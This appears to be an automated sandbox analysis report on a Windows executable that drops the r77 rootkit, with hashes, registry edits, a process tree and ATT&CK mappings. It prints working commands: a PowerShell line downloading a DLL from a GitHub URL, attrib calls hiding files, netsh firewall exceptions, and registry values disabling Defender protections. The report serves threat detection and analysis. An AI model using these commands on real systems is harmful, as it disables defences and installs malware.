Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250211-en -
resource tags
arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system -
submitted
17-02-2025 02:39
Static task
static1
Behavioral task
behavioral1
Sample
361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe
Resource
win10v2004-20250211-en
General
-
Target
361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe
-
Size
36KB
-
MD5
03f6e22347844b1c83b8b3a52ae0a798
-
SHA1
317198a65c39c56ca0a5b32c6f9ba9712b68e326
-
SHA256
361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174
-
SHA512
a85bd36cb38ff57d687f1ab41d0fcfe82f88cdd554d66813bf789e0ab7bd90c2f41c7fca8a486c5f187e1776e344977ac998f5c85d2c6200be2cd2fa999d7777
-
SSDEEP
768:Z45PqAxhRAfy0vq/hykAvgXYPv9kj2Y3qjhSKM91g:e5PqAFADtvgo39s3qjh5gi
Malware Config
Extracted
https://github.com/NGROKC/CTC/raw/main/CTC64.dll
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/memory/4436-1-0x00000000009A0000-0x00000000009B0000-memory.dmp disable_win_def behavioral2/files/0x000c000000023ca1-11.dat disable_win_def -
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" $77-.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" $77-.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" $77-.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection $77-.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" $77-.exe -
R77 family
-
r77 rootkit payload 1 IoCs
Detects the payload of the r77 rootkit.
resource yara_rule behavioral2/files/0x000400000001ec18-50.dat r77_payload -
Blocklisted process makes network request 2 IoCs
flow pid Process 31 692 powershell.exe 33 692 powershell.exe -
Downloads MZ/PE file 2 IoCs
flow pid Process 58 1464 Process not Found 33 692 powershell.exe -
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4100 netsh.exe 1904 netsh.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 3844 attrib.exe 4896 attrib.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Control Panel\International\Geo\Nation 361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe Key value queried \REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\Control Panel\International\Geo\Nation $77-.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-.exe $77-.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-.exe $77-.exe -
Executes dropped EXE 1 IoCs
pid Process 2384 $77-.exe -
Loads dropped DLL 5 IoCs
pid Process 1464 Process not Found 2304 Process not Found 1732 Process not Found 4916 vssvc.exe 2288 Process not Found -
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features $77-.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" $77-.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1318997816-2171176372-1451785247-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77- = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-.exe" $77-.exe -
pid Process 692 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 27 discord.com 28 discord.com 32 raw.githubusercontent.com 33 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $77-.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4668 MicrosoftEdgeUpdate.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 692 powershell.exe 692 powershell.exe 2648 powershell.exe 2648 powershell.exe 4916 vssvc.exe 4916 vssvc.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
description pid Process Token: SeDebugPrivilege 2384 $77-.exe Token: SeDebugPrivilege 692 powershell.exe Token: SeDebugPrivilege 2648 powershell.exe Token: SeBackupPrivilege 4916 vssvc.exe Token: SeRestorePrivilege 4916 vssvc.exe Token: SeAuditPrivilege 4916 vssvc.exe Token: 33 2384 $77-.exe Token: SeIncBasePriorityPrivilege 2384 $77-.exe Token: 33 2384 $77-.exe Token: SeIncBasePriorityPrivilege 2384 $77-.exe Token: 33 2384 $77-.exe Token: SeIncBasePriorityPrivilege 2384 $77-.exe Token: 33 2384 $77-.exe Token: SeIncBasePriorityPrivilege 2384 $77-.exe Token: 33 2384 $77-.exe Token: SeIncBasePriorityPrivilege 2384 $77-.exe Token: 33 2384 $77-.exe Token: SeIncBasePriorityPrivilege 2384 $77-.exe Token: 33 2384 $77-.exe Token: SeIncBasePriorityPrivilege 2384 $77-.exe Token: 33 2384 $77-.exe Token: SeIncBasePriorityPrivilege 2384 $77-.exe Token: 33 2384 $77-.exe Token: SeIncBasePriorityPrivilege 2384 $77-.exe Token: 33 2384 $77-.exe Token: SeIncBasePriorityPrivilege 2384 $77-.exe Token: 33 2384 $77-.exe Token: SeIncBasePriorityPrivilege 2384 $77-.exe Token: 33 2384 $77-.exe Token: SeIncBasePriorityPrivilege 2384 $77-.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 4436 wrote to memory of 708 4436 361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe 88 PID 4436 wrote to memory of 708 4436 361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe 88 PID 4436 wrote to memory of 708 4436 361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe 88 PID 708 wrote to memory of 3844 708 cmd.exe 90 PID 708 wrote to memory of 3844 708 cmd.exe 90 PID 708 wrote to memory of 3844 708 cmd.exe 90 PID 4436 wrote to memory of 2384 4436 361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe 91 PID 4436 wrote to memory of 2384 4436 361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe 91 PID 4436 wrote to memory of 2384 4436 361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe 91 PID 2384 wrote to memory of 1204 2384 $77-.exe 92 PID 2384 wrote to memory of 1204 2384 $77-.exe 92 PID 2384 wrote to memory of 1204 2384 $77-.exe 92 PID 1204 wrote to memory of 4896 1204 cmd.exe 94 PID 1204 wrote to memory of 4896 1204 cmd.exe 94 PID 1204 wrote to memory of 4896 1204 cmd.exe 94 PID 2384 wrote to memory of 4100 2384 $77-.exe 95 PID 2384 wrote to memory of 4100 2384 $77-.exe 95 PID 2384 wrote to memory of 4100 2384 $77-.exe 95 PID 2384 wrote to memory of 1904 2384 $77-.exe 96 PID 2384 wrote to memory of 1904 2384 $77-.exe 96 PID 2384 wrote to memory of 1904 2384 $77-.exe 96 PID 2384 wrote to memory of 1232 2384 $77-.exe 99 PID 2384 wrote to memory of 1232 2384 $77-.exe 99 PID 2384 wrote to memory of 1232 2384 $77-.exe 99 PID 1232 wrote to memory of 692 1232 cmd.exe 101 PID 1232 wrote to memory of 692 1232 cmd.exe 101 PID 1232 wrote to memory of 692 1232 cmd.exe 101 PID 2384 wrote to memory of 2648 2384 $77-.exe 106 PID 2384 wrote to memory of 2648 2384 $77-.exe 106 PID 2384 wrote to memory of 2648 2384 $77-.exe 106 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 3844 attrib.exe 4896 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe"C:\Users\Admin\AppData\Local\Temp\361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174.exe"3⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3844
-
-
-
C:\ProgramData\$77-.exe"C:\ProgramData\$77-.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\ProgramData\$77-.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\ProgramData\$77-.exe"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4896
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\ProgramData\$77-.exe" "$77-.exe" ENABLE3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4100
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\ProgramData\$77-.exe" "$77-.exe" ENABLE3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','C:\ProgramData\\r77-x64.dll');exit4⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NDczRDdCMTMtQUY4MC00NjEyLUJFQzAtRkUyNENFOTFFQzE3fSIgdXNlcmlkPSJ7NDdERjI5NjEtMjAzNC00RUIyLTlCQkItNzA1N0E2RjE1MDEwfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7MEQ5QTZCRTAtN0VEMC00MTE4LUEwNjEtRTM3QkU2RDg3OUNEfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI1IiBpbnN0YWxsZGF0ZXRpbWU9IjE3MzkyODMzNzEiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4Mzc1NDE5Mjc1MzAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MTE2MDE0NjkyIi8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:4668
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4916
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
2AppInit DLLs
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
2AppInit DLLs
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD503f6e22347844b1c83b8b3a52ae0a798
SHA1317198a65c39c56ca0a5b32c6f9ba9712b68e326
SHA256361a99ef210f2f204f1ed6057e6e6c27a772aee6fcde7e41e914b816e5ea9174
SHA512a85bd36cb38ff57d687f1ab41d0fcfe82f88cdd554d66813bf789e0ab7bd90c2f41c7fca8a486c5f187e1776e344977ac998f5c85d2c6200be2cd2fa999d7777
-
Filesize
147KB
MD51b8bd653321cf3cbc786e563555fbc75
SHA15638efe0476c8c1b74c6604db419be814d1d90a0
SHA256919a332e85d7c32a6f0a1bdd15b211b8b273b73fe05a553ea0f230a0958586c7
SHA512bafdbc8413828c5427983fa0e9403a2d9a88d0ad2f27f92842310852d273f2d2c9a0c6f9f64e1aac03fadf49f9a3bcf58c6b7c8b06debcce46536114cde0175b
-
Filesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
Filesize
16KB
MD56fe8f039ab7dd7769a4246ed64a7c2e9
SHA114ab64a0153789a0ffe7fcd959c9547396434ee3
SHA256cdf89c3712c41b0cbbebfe9cc246098a9041e9581471ec5a78d0a35975a06d81
SHA51286d80ebd1118794f489bb1dbad63f1872b424ff0eb92c0f48fcb0859b719e37e7212e1dd84bd05dccace3ebbaa9b9b583b0c495b830873ad66ec0bf1845f9618
-
Filesize
235B
MD5fa2df82470638d18f85bc54dd7f001aa
SHA1eae60eab30561b413dba2924782a858722c0ecbe
SHA256ab41cefaca31b47651bcc22adf49d17a7fe094bcee8ee1cdc4d60ad4c6b5a604
SHA512f17f20809c2a7f89925171d07fa3a4c7215274595e0eb2de8ce50ae466120ead7355224a1a830a023ac2a0abcb0c1932221d3c2c880b797d7bbb4bc5445326aa
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82